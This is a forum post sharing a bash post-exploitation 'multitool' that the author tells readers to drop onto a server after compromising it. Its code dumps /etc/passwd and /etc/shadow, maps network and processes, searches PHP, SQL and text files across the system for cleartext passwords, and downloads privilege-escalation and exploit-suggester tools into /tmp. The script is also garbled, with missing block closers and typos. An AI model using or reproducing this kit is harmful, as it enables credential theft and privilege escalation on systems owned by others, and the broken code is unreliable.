I just finished writing this dank as fuck 300+ lines bash script of ultimate pwnage. Basically what it does is enumerate the system, and provides you with easy access to tools needed to exploit the system and fin privilege escalation vulnerabilities. It also looks for cleartext passwords in web app files and finds log files and if you need any more of that sort of enumeration action it provides for you the means to download scripts specifically for that as well. Not only that, it automates unpacking of zip files and saves you loads of time from manually having to input a shit ton of complex commands that are hard to remember anyway.
All you need to do is compromise a server and wget this script to the /tmp/ directory or wherever and the rest is automated. Please feel free to use it as you see fit.
function usage()
{ clear 2>/dev/null
echo " _____ _ _____ _ _ "
echo "| __ |___ ___| |_ | | |_| |_ "
echo "| __ -| .'|_ -| || -| | _|"
echo "|_____|__,|___|_|_||__|__|_|_| "
printf "\nBash Kit - Multitool\n"
printf "\n Bash Kit - Multitool aims to be a comprehensive assistant for operations
and utilities related to system enumeration, vulnerability identification,
exploitation and privilege escalation.
The 'Usage' option prints this informational message. The option 'System Enumeration'
Attempts to retrieve system information such as OS and kernel details, network status,
processes, system logs and more. 'Common Utilities' checks for the existence of
useful utilities such as telnet, netcat, tcpdump etc. 'External Utilities' opens
a menu which lets you download external utilities that may prove to be helpful
with further enumeration, vulnerability identification and privilege escalation.
Finally the option 'Cleartext Credentials' searches for text and web application
files that contain certain keywords in order to find potential cleartext passwords.
function init_enum()
{ clear 2>/dev/null
echo " _____ _ _____ _ _ "
echo "| __ |___ ___| |_ | | |_| |_ "
echo "| __ -| .'|_ -| || -| | _|"
echo "|_____|__,|___|_|_||__|__|_|_| "
printf "\nBash Kit - Multitool\n"
printf "\n\nThis module enumerates system information and appends it to a textfile.\n"
printf "\nThese items will be enumerated:
1. User IDs login history & /etc/passwd.
2. OS details and mounted disks, kernel.
3. Network status and information.
4. Process info & cron jobs.
5. System logs. \n\n"
read -p 'Continue? Y/n : ' choice
if [[ $choice == 'n' ]]; then
echo "Aborted"
printf "\n\nPlease provide a path to which the output will be saved. I.e /tmp/output.txt\n"
read -p 'Path to outfile : ' outfile
echo "+-+-+-+-+" | tee -a $outfile
echo "|L|O|G|S|" | tee -a $outfile
echo "+-+-+-+-+" | tee -a $outfile
printf "\n\nUser IDs\n" | tee -a $outfile
user=$(whoami) && printf "\nCurrent user: $user\n" | tee -a $outfile
printf "\n\n Other Users\n" | tee -a $outfile
cat /etc/passwd | tee -a $outfile 1>&2
printf "\n\n" | tee -a $outfile
cat /etc/shadow | tee -a $outfile 1>&2
printf "\n\n" | tee -a $outfile
id | tee -a $outfile 1>&2
printf "\n\n" | tee -a $outfile
last | tee -a $outfile 1>&2
sleep 0.5 && clear 2>/dev/null
printf "\n\nOS details and mounted disks\n\n" | tee -a $outfile
uname -a | tee -a $outfile 1>&2
printf "\n\n" | tee -a $outfile
dpkg -l linux-image-\* | grep ^ii | tee -a $outfile 1>&2
printf "\n\n" | tee -a $outfile
df -h | tee -a $outfile 1>&2
sleep 0.5 && clear 2>/dev/null
printf "\n\nNetwork status & info\n\n" | tee -a $outfile
ifconfig -a | tee -a $outfile 1>&2
printf "\n\n" | tee -a $outfile
arp -e | tee -a $outfile 1>&2
printf "\n\n" | tee -a $outfile
netstat -atp | tee -a $outfile 1>&2
nodes=&(lsof -i) && printf "\nListening nodes: $nodes\n" | tee -a $outfile
printf "\n\n" | tee -a $outfile
iptables -L | tee -a $outfile 1>&2
sleep 0.5 && clear 2>/dev/null
printf "\n\nProcess info\n\n" | tee -a $outfile
ps -d -f | tee -a $outfile 1>&2
printf "\n\n Cron jobs.\n\n" | tee -a $outfile
echo "Daily\n" | tee -a $outfile
ls -la /etc/cron.daily/ | tee -a $outfile 1>&2
echo "\nWeekly\n" | tee -a $outfile
ls -la /etc/cron.weekly/ | tee -a $outfile 1>&2
echo "\nMonthly\n" | tee -a $outfile
ls -la /etc/cron.monthly/ | tee -a $outfile 1>&2
sleep 0.5 && clear 2>/dev/null
printf "\n\nSystem Logs\n\n" | tee -a $outfile
find / -name "*.log" | tee -a $outfile 1>&2
echo "Done, output saved to $outfile"
sleep 1
function common_util()
{ clear 2>/dev/null
echo " _____ _ _____ _ _ "
echo "| __ |___ ___| |_ | | |_| |_ "
echo "| __ -| .'|_ -| || -| | _|"
echo "|_____|__,|___|_|_||__|__|_|_| "
printf "\nBash Kit - Multitool\n"
printf "\n\nListing common, available utilities\n\n"
which curl 2>/dev/null
which wget 2>/dev/null
which telnet 2>/dev/null
which netcat 2>/dev/null
which tcpdump 2>/dev/null
which nmap 2>/dev/null
which mknod 2>/dev/null
which ssh 2>/dev/null
which python 2>/dev/null
which ruby 2>/dev/null
which perl 2>/dev/null
which gcc 2>/dev/null
printf "\n\nDone. Would you like to list all utilities?\n\n"
read -p 'Continue? Y/n : ' choice
if [[ $choice == 'y' ]]; then
printf "\n\n"
ls -alh /usr/bin/
printf "\n\nReturning to menu.\n\n"
function cleartext()
{ clear 2>/dev/null
echo " _____ _ _____ _ _ "
echo "| __ |___ ___| |_ | | |_| |_ "
echo "| __ -| .'|_ -| || -| | _|"
echo "|_____|__,|___|_|_||__|__|_|_| "
printf "\nBash Kit - Multitool\n"
printf "\n\nThis module looks for web application and text files containing certain
keywords in order to find cleartext passswords and usernames. Currently files ending in
'.php', '.sql' and '.txt' will be searched. Results will be saved to a textfile\n\n"
read -p 'Continue? Y/n : ' choice
if [[ $choice == 'y' ]]; then
reap -p 'Path to outfile: ' cred_out
printf "\nPHP Files\n" | tee -a $cred_out
find / -name "*.php" -print0 | xargs -0 grep -i -n "var password" | tee -a $cred_out 1>&2
find / -name "*.php" -print0 | xargs -0 grep -i -n "var user" | tee -a $cred_out 1>&2
sleep 0.5 && clear 2>/dev/null
printf "\nSQL Files\n" | tee -a $cred_out
find / -name "*.sql" -print0 | xargs -0 grep -i -n "password" | tee -a $cred_out 1>&2
find / -name "*.sql" -print0 | xargs -0 grep -i -n "user" | tee -a $cred_out 1>&2
sleep 0.5 && clear 2>/dev/null
printf "\nText Files\n"
find / -name "*.txt" -print0 | xargs -0 grep -i -n "password" | tee -a $cred_out 1>&2
find / -name "*.txt" -print0 | xargs -0 grep -i -n "username" | tee -a $cred_out 1>&2
sleep 0.5 && clear 2>/dev/null
echo "Done, output saved to $cred_out"
sleep 1
echo "Aborted"
function ext_util()
{ clear 2>/dev/null
echo " _____ _ _____ _ _ "
echo "| __ |___ ___| |_ | | |_| |_ "
echo "| __ -| .'|_ -| || -| | _|"
echo "|_____|__,|___|_|_||__|__|_|_| "
printf "\nBash Kit - Multitool\n\n"
printf "\n\nThis module provides a number of external utilities to download.
Choose a utility to start downloading and unpacking it in the /tmp/ directory\n"
PS3='Please enter your choice: '
options=("LinEnum - System enumeration" "Firmwalker - Advanced enumeration" "LUNAR - Unix security auditing" "PyCat - Python network tool" "Python exploit suggester" "Perl exploit suggester" "Priv-Esc checker" "All" "Done")
select opt in "${options[@]}"
case $opt in
"LinEnum - System enumeration")
printf "\n\n"
wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip
"Firmwalker - Advanced enumeration")
printf "\n\n"
wget -O /tmp/firmwalker.zip https://github.com/craigz28/firmwalker/archive/master.zip
"LUNAR - Unix security auditing")
printf "\n\n"
wget -O /tmp/LUNAR.zip https://github.com/lateralblast/lunar/archive/master.zip
"PyCat - Python network tool")
printf "\n\n"
wget -O /tmp/PyCat.zip https://github.com/NullArray/PyCat/archive/master.zip
"Python exploit suggester")
printf "\n\n"
wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py
"Perl exploit suggester")
printf "\n\n"
wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip
"Priv-Esc checker")
printf "\n\n"
wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip
wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip
wget -O /tmp/firmwalker.zip https://github.com/craigz28/firmwalker/archive/master.zip
wget -O /tmp/LUNAR.zip https://github.com/lateralblast/lunar/archive/master.zip
wget -O /tmp/PyCat.zip https://github.com/NullArray/PyCat/archive/master.zip
wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py
wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip
wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip
*) echo invalid option;;
printf "\n\nIn case external utilities were downloaded would you like Bash Kit to automatically unzip them?\n\n"
read -p '[Y]es/[N]o: ' choice
if [[ $choice == 'y' ]]; then
dir=$(pwd) && cd /tmp/
printf "\n\nUnzipping downloaded packages where applicable.\n\n"
for zip in *.zip
dirname=`echo $zip | sed 's/\.zip$//'`
if mkdir $dirname
if cd $dirname
unzip ../$zip
cd ..
rm -f $zip
echo "Could not unpack $zip - cd failed"
echo "Could not unpack $zip - mkdir failed"
cd $dir
printf "\n\nDone, returning to menu...\n\n"
sleep 1
printf "\n\nReturning to menu\n\n"
function main()
{ echo " _____ _ _____ _ _ "
echo "| __ |___ ___| |_ | | |_| |_ "
echo "| __ -| .'|_ -| || -| | _|"
echo "|_____|__,|___|_|_||__|__|_|_| "
printf "\nBash Kit - Multitool\n\n"
PS3='Please enter your choice: '
options=("Usage" "System Enumeration" "Common Utilities" "External Utilities" "Cleartext Credentials" "Quit")
select opt in "${options[@]}"
case $opt in
"System Enumeration")
"Common Utilities")
"External Utilities")
"Cleartext Credentials")
exit 1
*) echo invalid option;;
It is available on my github as well if you'd like.
https://github.com/NullArray/Bash-Kit-MultitoolPost last edited by Sophie at 2017-02-02T09:04:01.841472+00:00Post last edited by Sophie at 2017-02-02T09:05:28.927645+00:00